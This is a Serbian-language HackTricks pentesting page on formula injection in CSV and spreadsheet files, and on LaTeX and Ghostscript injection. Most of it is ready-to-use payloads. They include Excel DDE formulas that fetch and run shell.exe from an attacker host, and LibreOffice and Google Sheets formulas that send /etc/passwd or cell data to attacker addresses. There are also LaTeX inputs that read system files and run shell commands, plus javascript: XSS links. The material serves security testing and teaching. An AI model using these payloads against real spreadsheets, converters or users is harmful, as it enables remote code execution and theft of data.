hacktricks/pentesting-web/formula-csv-doc-latex-ghostscript-injection.md

12 KiB

Formula/CSV/Doc/LaTeX/GhostScript Injection

Naučite hakovanje AWS-a od nule do heroja sa htARTE (HackTricks AWS Red Team Expert)!

Drugi načini podrške HackTricks-u:

Try Hard Security Group

{% embed url="https://discord.gg/tryhardsecurity" %}


Formula Injection

Info

Ako se vaš unos reflektuje unutar CSV fajlova (ili bilo kog drugog fajla koji će verovatno biti otvoren u Excel-u), možda ćete moći da ubacite Excel formule koje će biti izvršene kada korisnik otvori fajl ili kada korisnik klikne na neki link unutar Excel tabele.

{% hint style="danger" %} Danas Excel upozorava (nekoliko puta) korisnika kada se nešto učitava izvan Excel-a kako bi ga sprečio od zlonamernih radnji. Stoga, poseban napor na socijalnom inženjeringu mora biti primenjen na krajnji payload. {% endhint %}

Wordlist

DDE ("cmd";"/C calc";"!A0")A0
@SUM(1+9)*cmd|' /C calc'!A0
=10+20+cmd|' /C calc'!A0
=cmd|' /C notepad'!'A1'
=cmd|'/C powershell IEX(wget attacker_server/shell.exe)'!A0
=cmd|'/c rundll32.exe \\10.0.0.1\3\2\1.dll,0'!_xlbgnm.A1

Sledeći primer je veoma koristan za eksfiltraciju sadržaja iz konačnog excel dokumenta i za obavljanje zahteva ka proizvoljnim lokacijama. Međutim, zahteva da korisnik klikne na link (i prihvati upozorenja).

Sledeći primer je preuzet sa https://payatu.com/csv-injection-basic-to-exploit

Zamislite da je došlo do bezbednosnog propusta u sistemu za upravljanje studentskim evidencijama koji je iskorišćen putem napada CSV ubacivanjem. Primarni cilj napadača je da kompromituje sistem koji koriste nastavnici za upravljanje detaljima studenata. Metoda uključuje ubacivanje zlonamernog sadržaja u aplikaciju, tačnije unošenjem štetnih formula u polja predviđena za detalje studenata. Napad se odvija na sledeći način:

  1. Ubacivanje Zlonamernog Sadržaja:
  • Napadač šalje formu sa detaljima studenata ali uključuje formulu koja se često koristi u tabelama (npr. =HYPERLINK("<zlonamerni_link>","Kliknite ovde")).
  • Ova formula je dizajnirana da kreira hiperlink, ali vodi ka zlonamernom serveru koji kontroliše napadač.
  1. Izvoz Kompromitovanih Podataka:
  • Nastavnici, nesvesni kompromitovanja, koriste funkcionalnost aplikacije za izvoz podataka u CSV fajl.
  • Kada se CSV fajl otvori, i dalje sadrži zlonamerni sadržaj. Ovaj sadržaj se pojavljuje kao klikabilan hiperlink u tabeli.
  1. Pokretanje Napada:
  • Nastavnik klikne na hiperlink, verujući da je to legitimni deo detalja studenata.
  • Klikom, osetljivi podaci (potencijalno uključujući detalje iz tabele ili računara nastavnika) se šalju na server napadača.
  1. Logovanje Podataka:
  • Server napadača prima i beleži osetljive podatke poslate sa računara nastavnika.
  • Napadač može zatim koristiti ove podatke za različite zlonamerne svrhe, dodatno kompromitujući privatnost i bezbednost studenata i institucije.

RCE

Proverite originalni post za dodatne detalje.

U specifičnim konfiguracijama ili starijim verzijama Excel-a, funkcionalnost nazvana Dinamička Razmena Podataka (DDE) može biti iskorišćena za izvršavanje proizvoljnih komandi. Da biste iskoristili ovo, sledeće postavke moraju biti omogućene:

  • Idite na Datoteka → Opcije → Centar za Poverenje → Postavke Centra za Poverenje → Spoljni Sadržaj, i omogućite Pokretanje Servera za Dinamičku Razmenu Podataka.

Kada se otvori tabela sa zlonamernim sadržajem (i ako korisnik prihvati upozorenja), sadržaj se izvršava. Na primer, da bi se pokrenula aplikacija kalkulatora, sadržaj bi bio:

`=cmd|' /C calc'!xxx`

Dodatne komande takođe mogu biti izvršene, kao što je preuzimanje i izvršavanje fajla korišćenjem PowerShell-a:

=cmd|' /C powershell Invoke-WebRequest "http://www.attacker.com/shell.exe" -OutFile "$env:Temp\shell.exe"; Start-Process "$env:Temp\shell.exe"'!A1

Lokalno uključivanje datoteka (LFI) u LibreOffice Calc

LibreOffice Calc može se koristiti za čitanje lokalnih datoteka i eksfiltraciju podataka. Evo nekoliko metoda:

  • Čitanje prvog reda iz lokalne datoteke /etc/passwd: ='file:///etc/passwd'#$passwd.A1
  • Eksfiltracija pročitanih podataka na server pod kontrolom napadača: =WEBSERVICE(CONCATENATE("http://<napadačeva IP adresa>:8080/",('file:///etc/passwd'#$passwd.A1)))
  • Eksfiltracija više od jednog reda: =WEBSERVICE(CONCATENATE("http://<napadačeva IP adresa>:8080/",('file:///etc/passwd'#$passwd.A1)&CHAR(36)&('file:///etc/passwd'#$passwd.A2)))
  • Eksfiltracija DNS-a (slanje pročitanih podataka kao DNS upita na DNS server pod kontrolom napadača): =WEBSERVICE(CONCATENATE((SUBSTITUTE(MID((ENCODEURL('file:///etc/passwd'#$passwd.A19)),1,41),"%","-")),".<napadačeva domena>"))

Google Sheets za eksfiltraciju podataka izvan opsega (OOB)

Google Sheets nudi funkcije koje se mogu iskoristiti za eksfiltraciju podataka izvan opsega:

  • CONCATENATE: Spaja nizove zajedno - =CONCATENATE(A2:E2)
  • IMPORTXML: Uvozi podatke iz strukturiranih tipova podataka - =IMPORTXML(CONCAT("http://<napadačeva IP adresa:Port>/123.txt?v=", CONCATENATE(A2:E2)), "//a/a10")
  • IMPORTFEED: Uvozi RSS ili ATOM feed-ove - =IMPORTFEED(CONCAT("http://<napadačeva IP adresa:Port>//123.txt?v=", CONCATENATE(A2:E2)))
  • IMPORTHTML: Uvozi podatke iz HTML tabela ili lista - =IMPORTHTML (CONCAT("http://<napadačeva IP adresa:Port>/123.txt?v=", CONCATENATE(A2:E2)),"table",1)
  • IMPORTRANGE: Uvozi opseg ćelija iz druge radne sveske - =IMPORTRANGE("https://docs.google.com/spreadsheets/d/[ID_radne_sveske]", "sheet1!A2:E2")
  • IMAGE: Umeće sliku u ćeliju - =IMAGE("https://<napadačeva IP adresa:Port>/images/srpr/logo3w.png")

LaTeX Injekcija

Obično serveri koje ćete pronaći na internetu koji pretvaraju LaTeX kod u PDF koriste pdflatex.
Ovaj program koristi 3 glavna atributa za (ne)dozvoljeno izvršavanje komandi:

  • --no-shell-escape: Onemogućava konstrukt \write18{komanda}, čak i ako je omogućen u texmf.cnf datoteci.
  • --shell-restricted: Isto kao --shell-escape, ali ograničeno na 'siguran' skup unapred definisanih **komandi (**Na Ubuntu 16.04 listu možete pronaći u /usr/share/texmf/web2c/texmf.cnf).
  • --shell-escape: Omogućava konstrukt \write18{komanda}. Komanda može biti bilo koja shell komanda. Ovaj konstrukt je obično zabranjen iz sigurnosnih razloga.

Međutim, postoje i drugi načini za izvršavanje komandi, pa je radi izbegavanja RCE vrlo važno koristiti --shell-restricted.

Čitanje datoteke

Možda ćete morati prilagoditi ubacivanje sa omotačima kao što su [ ili $.

\input{/etc/passwd}
\include{password} # load .tex file
\lstinputlisting{/usr/share/texmf/web2c/texmf.cnf}
\usepackage{verbatim}
\verbatiminput{/etc/passwd}

Pročitajte jednolinijski fajl

\newread\file
\openin\file=/etc/issue
\read\file to\line
\text{\line}
\closein\file

Čitanje višelinijske datoteke

\newread\file
\openin\file=/etc/passwd
\loop\unless\ifeof\file
\read\file to\fileline
\text{\fileline}
\repeat
\closein\file

Napiši fajl

\newwrite\outfile
\openout\outfile=cmd.tex
\write\outfile{Hello-world}
\closeout\outfile

Izvršenje komande

Ulaz komande će biti preusmeren na stdin, koristite privremenu datoteku da biste je dobili.

\immediate\write18{env > output}
\input{output}

\input{|"/bin/hostname"}
\input{|"extractbb /etc/passwd > /tmp/b.tex"}

# allowed mpost command RCE
\documentclass{article}\begin{document}
\immediate\write18{mpost -ini "-tex=bash -c (id;uname${IFS}-sm)>/tmp/pwn" "x.mp"}
\end{document}

# If mpost is not allowed there are other commands you might be able to execute
## Just get the version
\input{|"bibtex8 --version > /tmp/b.tex"}
## Search the file pdfetex.ini
\input{|"kpsewhich pdfetex.ini > /tmp/b.tex"}
## Get env var value
\input{|"kpsewhich -expand-var=$HOSTNAME > /tmp/b.tex"}
## Get the value of shell_escape_commands without needing to read pdfetex.ini
\input{|"kpsewhich --var-value=shell_escape_commands > /tmp/b.tex"}

Ako dobijete bilo kakvu LaTex grešku, razmislite o korišćenju base64 da biste dobili rezultat bez loših karaktera

\immediate\write18{env | base64 > test.tex}
\input{text.tex}
\input|ls|base4
\input{|"/bin/hostname"}

Cross Site Scripting

Od @EdOverflow

\url{javascript:alert(1)}
\href{javascript:alert(1)}{placeholder}

Ghostscript Injection

Proverite https://blog.redteam-pentesting.de/2023/ghostscript-overview/

Reference

Try Hard Security Group

{% embed url="https://discord.gg/tryhardsecurity" %}

Naučite hakovanje AWS-a od nule do heroja sa htARTE (HackTricks AWS Red Team Expert)!

Drugi načini podrške HackTricks-u: